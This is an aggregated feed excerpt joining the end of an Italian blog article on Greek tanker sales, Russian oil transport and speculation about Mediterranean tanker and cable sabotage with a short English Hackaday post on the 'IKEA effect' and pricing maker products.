TradeWinds ha inoltre rilevato che con lo scoppio della guerra ucraina e l’aumento delle tariffe del trasporto che c’è stata una “grande vendita di navi greche” ma anche aziende statunitensi e norvegesi ne hanno beneficiato, ma le navi greche, secondo l’economista capo dell’Institute of International Finance, Robin Brooks, rappresentano attualmente quasi il 50 percento della capacità delle petroliere in uscita dai porti russi, rispetto al 33 percento prima della guerra russo-ucraina ma bisogna ripeterlo: “rimane del tutto legittimo trasportare greggio russo fintanto che rispetta il tetto massimo di prezzo di 60 $ al barile”. Il boom di vendite – di vecchie petroliere – si rileva nel febbraio del 2022, data dalla quale sono state vendute circa 125 petroliere di armatori greci per un valore di 4 miliardi di dollari, vendite che sono proseguite poi nel 2023. Particolarmente cercate sono le petroliere Suezmax e Aframax: il terzo e il quarto tipo più grande di petroliere per il greggio e con dimensioni perfette per lo spostamento di carichi russi. La stessa Thenamaris ha venduto la petroliera Aframax Seatrust (IMO:9979993) – cifra stimata di 35 milioni di dollari – ma come succede per tutte queste navi, il nome del nuovo proprietario rimane oscurato. Tuttavia tra gli acquirenti secondo ForeignPolicy troviamo Emirati Arabi Uniti, Cina, Turchia (tra cui la BEKS Ship Management & Trading) e India.

Così gli armatori greci in una frenesia di vendite si sono sbarazzati delle vecchie navi potendo cosi rinnovare la loro flotta, spesso con navi più piccole.

Thenamaris è recentemente emerso come il nuovo proprietario della petroliera da 108.500 dwt Southern Rouse (rinominata Sealoyalty (IMO:9783928), costruita nel 2018), un’ex nave di proprietà di Nissen Kaiun che, secondo quanto riferito, ha cambiato proprietario nel dicembre 2022.

Fonte immagine: app.maritimeoptima.com/, Sealoyalty, ultima rotta.

Cui prodest

E quando quel mondo finiva con le colonne d’Ercole ad ovest e con i giardini di Babilonia ad est, i nomi di antichi navigatori come Annone, Himilco, Nearco, Arriano, Plinio, e delle loro vicende, erano già leggenda. _ Antichi navigatori verso le Indie e le antiche colonne d’Ercole.

Alla domanda di chi trarrebbe vantaggio dei sabotaggi avvenuti in questi mesi a diverse petroliere, vi sono diverse risposte molte delle quali ancora speculative, senza prove verificate. Le motivazioni possono essere geopolitiche, economiche o strategiche e vanno da stati che trarrebbero vantaggio da un’interruzione delle vie energetiche del Mediterraneo o delle esportazioni di petrolio rivali sino ad organizzazioni criminali che operano nel mercato nero. Secondariamente i progetti di gas del Mediterraneo orientale – che abbiamo visto prima – potrebbero trarre vantaggio dagli incidenti per accelerare le importazioni di gas o i progetti delle pipeline in corso. In modo molto minore invece gli incidenti avrebbero come obiettivo l’aumento dei premi per l’assicurazione marittima e della domanda di scorte navali private, anche se i traders traggono sempre vantaggio dal panico per trarre i loro profitti.

Abbamo constatato che le esportazioni in oggetto risultano quantomeno “legali” ma il loro sabotaggio potrebbe sia avere l’obiettivo di monopolizzarne il commercio di un poteziale mercato nero, sia essere la conseguenza di operazioni volte a fermare il commercio di pertrolio russo da parte di compagnie greche. Infine più vicino alla narrazione cinematografica ma senza Brad Pitt (L’esercito delle 12 scimmie) sono gli attivisti ma è molto improbabile che causino esplosioni e comunque i fenomeni di ecoterrorismo sono in lento e costante declino in tutto il mondo.

La Grecia come abbiamo visto rimane un attore importante nel transito di risorse energetiche nel Mediterrano, sabotare le sue navi destabilizza in qualche modo il mercato, facendo pressione sull’Europa, nelle controversie sui confini marittimi e sui diritti sugli idrocarburi e le tensioni con la Turchia su Cipro e Creta. Al largo della Libia invece le riserve di petrolio e gas offshore sono contese da fazioni rivali (ad esempio, il Governo di accordo nazionale sostenuto dalla Turchia contro l’Esercito nazionale libico sostenuto da Russia/Egitto/EAU). I sottomarini in questa zona – es. Krasnodar – che monitorano le acque libiche possono raccogliere informazioni, proteggere le infrastrutture energetiche o consentire operazioni segrete per controllare le risorse ma anche monitorare le spedizioni di armi alle fazioni (violando gli embarghi delle Nazioni Unite) o ancora dispiegare droni o sommozzatori sottomarini per manomettere cavi o petroliere.

Infine tutti questi incidenti che ho elencato lungo l’articolo, provocano il caos e riflettono un moderno campo di battaglia in cui convergono energia, dati e potenza navale. Il Mediterraneo è diventato un teatro per un conflitto ibrido, non dimenticando che anche la Libia è al centro.

Bibliografia

• atlanticcouncil.org/blogs/turk…
• crisisgroup.org/europe-central…
• depa-int.gr/en/interconnector-…
• greenpeace.org/italy/storia/17…
• grassley.senate.gov/imo/media/…
• ​​reuters.com/graphics/IRAN-OIL/…
• home.treasury.gov/news/press-r… (Treasury Targets Networks Facilitating Illicit Trade and UAV Transfers on Behalf of Iranian Military, Aprile 2025)
• greenpeace.org/italy/storia/17…
• lawfaremedia.org/article/whats…
• context.ro/a-romanian-milliona…
• investigate-europe.eu/en/posts…
• feem.it/ricerca/progetti/the-f…
• iiss.org/publications/strategi…
• irpimedia.irpi.eu/adriaticocri…
• nauticareport.it/dettnews/stor…
• itamilradar.com/2025/02/15/mon…
• crsreports.congress.gov/produc…
• foreignpolicy.com/2023/09/11/g…
• perma.cc/YXS8-ACXT
• maritime-executive.com/article…
• documenti.camera.it/_dati/leg1… news.usni.org/2025/01/22/u-k-s…
• blackseanews.net/en/read/22801…
• it.marketscreener.com/notizie/…

L'articolo Il gioco del gatto e del topo tra sabotaggi di petroliere e cavi sottomarini proviene da il blog della sicurezza informatica.

For the maker looking to turn their project into a business, trying to price your widget can be a bit of a conundrum. You want to share your widget with the world without going broke in the process. What if you could achieve both, letting the end user finish assembly?

[PDF]While over a decade has passed since Harvard Business School released this study on what they dub “The IKEA Effect,” we suspect that most of it will still be relevant given the slow pace of human behavior change. In short, when you make someone become part of the process of manufacturing or assembling their stuff, it makes them value it more highly than if it was already all put together in the box.

Interestingly, the researchers found “that consumers believe that their self-made products rival those of experts,” and that this is true regardless of whether these people consider themselves to be DIY enthusiasts or not. This only holds if the person is successful though, so it’s critical to have good instructions. If you have a mass market item in the works, you probably don’t want to require someone with no experience to solder something, but as IKEA has shown, nearly anybody can handle some hex screws and Allen wrenches.

If you’re looking for more advice on how to get your invention in people’s hands, how about this Supercon talk by Carrie Sundra about manufacturing on a shoestring budget or this video from Simone Giertz on her experiences with manufacturing from idea to finished product. You might want to steer clear of people promising patents for pennies on commercials, though.

hackaday.com/2025/03/02/some-a…